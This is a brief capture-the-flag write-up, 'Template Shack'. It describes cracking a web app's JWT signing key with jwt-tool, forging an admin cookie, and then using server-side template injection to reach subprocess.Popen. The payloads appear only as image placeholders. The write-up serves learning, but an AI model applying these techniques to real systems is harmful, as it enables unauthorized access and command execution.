Template Shack

less than 1 minute read

img

img

Nothing out of place. Checking the cookies we see what looks to be a JSON Web Token

img

jwt.io confirms that it’s a JWT and it’s using HS256 as the hashing algorithm. Let’s see if we can forge our own by cracking this one.

img

Using jwt-tool to crack the key

img

Time to forge our own admin JWT:

img

By changing the cookie value to our new JWT, we’ve accessed the admin account

img

Nothing seems to work here, and the only two options that do work kick back a 404.

img

Interesting. The URL that’s causing the error seems to be reflected on the page. Seems like we can control it.

Since the name of the challenge is ‘Template Shack’, let’s jump right into template injection

img

img

Template injection is a go!

Starting with

img

we can look for the 'subprocess.Popen' class

img

we need it’s exact index in the list. Let’s use slicing to find it:

img

By continuously slicing higher indicies, we can track down exactly where subprocess.Popen is

img

img

Now that it’s at the top of the list, we know it’s at 405

Payload:

img

Full url:

img

img